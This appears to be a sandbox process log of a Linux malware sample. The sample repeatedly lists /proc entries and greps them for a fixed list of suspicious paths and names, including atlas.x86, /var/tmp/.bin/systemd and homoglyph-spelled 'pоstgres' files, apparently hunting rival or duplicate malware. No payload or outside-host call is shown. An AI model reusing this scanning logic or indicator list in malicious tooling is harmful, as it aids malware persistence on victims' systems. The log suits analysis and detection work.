/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1230
-
-
/bin/grepgrep exe2⤵PID:1233
-
-
/bin/lsls -latrh /proc/kallsyms2⤵PID:1232
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1235
-
-
/bin/grepgrep exe2⤵PID:1238
-
-
/bin/lsls -latrh /proc/kcore2⤵PID:1237
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1240
-
-
/bin/lsls -latrh /proc/keys2⤵PID:1242
-
-
/bin/grepgrep exe2⤵PID:1243
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1245
-
-
/bin/grepgrep exe2⤵PID:1248
-
-
/bin/lsls -latrh /proc/key-users2⤵PID:1247
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1250
-
-
/bin/grepgrep exe2⤵PID:1253
-
-
/bin/lsls -latrh /proc/kmsg2⤵PID:1252
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1255
-
-
/bin/grepgrep exe2⤵PID:1258
-
-
/bin/lsls -latrh /proc/kpagecgroup2⤵PID:1257
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1260
-
-
/bin/grepgrep exe2⤵PID:1263
-
-
/bin/lsls -latrh /proc/kpagecount2⤵PID:1262
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1265
-
-
/bin/grepgrep exe2⤵PID:1268
-
-
/bin/lsls -latrh /proc/kpageflags2⤵PID:1267
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1270
-
-
/bin/grepgrep exe2⤵PID:1274
-
-
/bin/lsls -latrh /proc/loadavg2⤵PID:1273
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1277
-
-
/bin/grepgrep exe2⤵PID:1280
-
-
/bin/lsls -latrh /proc/locks2⤵PID:1279
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1283
-
-
/bin/grepgrep exe2⤵PID:1287
-
-
/bin/lsls -latrh /proc/meminfo2⤵PID:1286
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1289
-
-
/bin/grepgrep exe2⤵PID:1293
-
-
/bin/lsls -latrh /proc/misc2⤵PID:1292
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1296
-
-
/bin/grepgrep exe2⤵PID:1299
-
-
/bin/lsls -latrh /proc/modules2⤵PID:1298
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1302
-
-
/bin/grepgrep exe2⤵PID:1306
-
-
/bin/lsls -latrh /proc/mounts2⤵PID:1305
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1308
-
-
/bin/grepgrep exe2⤵PID:1313
-
-
/bin/lsls -latrh /proc/net2⤵PID:1312
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1315
-
-
/bin/grepgrep exe2⤵PID:1319
-
-
/bin/lsls -latrh /proc/pagetypeinfo2⤵PID:1318
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1322
-
-
/bin/grepgrep exe2⤵PID:1325
-
-
/bin/lsls -latrh /proc/partitions2⤵PID:1324
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1328
-
-
/bin/grepgrep exe2⤵PID:1332
-
-
/bin/lsls -latrh /proc/sched_debug2⤵PID:1331
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1334
-
-
/bin/grepgrep exe2⤵PID:1338
-
-
/bin/lsls -latrh /proc/schedstat2⤵PID:1337
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1341
-
-
/bin/grepgrep exe2⤵PID:1345
-
-
/bin/lsls -latrh /proc/self2⤵PID:1344
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1348
-
-
/bin/grepgrep exe2⤵PID:1351
-
-
/bin/lsls -latrh /proc/slabinfo2⤵PID:1350
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1354
-
-
/bin/grepgrep exe2⤵PID:1358
-
-
/bin/lsls -latrh /proc/softirqs2⤵PID:1357
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1360
-
-
/bin/grepgrep exe2⤵PID:1364
-
-
/bin/lsls -latrh /proc/stat2⤵PID:1363
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1367
-
-
/bin/grepgrep exe2⤵PID:1371
-
-
/bin/lsls -latrh /proc/swaps2⤵PID:1370
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1374
-
-
/bin/grepgrep exe2⤵PID:1377
-
-
/bin/lsls -latrh /proc/sys2⤵PID:1376
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1380
-
-
/bin/grepgrep exe2⤵PID:1384
-
-
/bin/lsls -latrh /proc/sysrq-trigger2⤵PID:1383
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1386
-
-
/bin/grepgrep exe2⤵PID:1390
-
-
/bin/lsls -latrh /proc/sysvipc2⤵
- System Network Configuration Discovery
PID:1389
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1393
-
-
/bin/grepgrep exe2⤵PID:1397
-
-
/bin/lsls -latrh /proc/thread-self2⤵PID:1396
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1400
-
-
/bin/grepgrep exe2⤵PID:1403
-
-
/bin/lsls -latrh /proc/timer_list2⤵PID:1402
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1405
-
-
/bin/grepgrep exe2⤵PID:1408
-
-
/bin/lsls -latrh /proc/tty2⤵PID:1407
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1410
-
-
/bin/grepgrep exe2⤵PID:1413
-
-
/bin/lsls -latrh /proc/uptime2⤵PID:1412
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1415
-
-
/bin/grepgrep exe2⤵PID:1418
-
-
/bin/lsls -latrh /proc/version2⤵PID:1417
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1420
-
-
/bin/grepgrep exe2⤵PID:1423
-
-
/bin/lsls -latrh /proc/vmallocinfo2⤵PID:1422
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1425
-
-
/bin/grepgrep exe2⤵PID:1428
-
-
/bin/lsls -latrh /proc/vmstat2⤵PID:1427
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1430
-
-
/bin/grepgrep exe2⤵PID:1433
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1432
-
-
